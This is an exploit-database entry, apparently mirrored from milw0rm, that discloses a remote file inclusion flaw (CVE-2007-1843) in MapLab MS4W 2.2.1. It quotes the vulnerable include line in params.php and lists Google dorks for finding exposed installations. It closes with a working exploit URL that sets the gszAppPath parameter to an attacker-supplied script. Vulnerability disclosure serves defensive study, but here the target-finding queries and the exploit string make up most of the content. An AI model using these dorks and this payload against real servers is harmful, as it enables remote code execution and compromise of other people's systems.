[] NeoSense
E X P L O I T S
title author type platform port cve id

MapLab MS4W 2.2.1 - Remote File Inclusion

Author: ka0x
type: webapps
platform: php
port: 
date_added: 2007-04-01 
date_updated: 2016-10-03 
verified: 1 
codes: OSVDB-34620;CVE-2007-1843 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.commaplab_ms4w-2.2.1.zip
Bug Found By ka0x
D.O.M TEAM
we are: anonyph;arp;ka0x;xarnuz
Contact: ka0x01@gmail.com
FROM SPAIN
---

Script: MapLab
Version: 2.2.1
Official Site: http://www.maptools.org
Download: http://www.maptools.org/dl/ms4w/maplab_ms4w-2.2.1.zip

--

Bug File: params.php
Path: /htdocs/gmapfactory/params.php

Bug code in line 130:
include_once($gszAppPath."htdocs/gmapfactory/build_phtml.php");

--
Dorks:

index.of /maplab-2.2
intitle:MapLab
index.of /maplab-2.2
index.of /maplab/

--

Exploit:
http://site.com/pathmaplab/htdocs/gmapfactory/params.php?gszAppPath=[EvilScript]

# milw0rm.com [2007-04-02]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.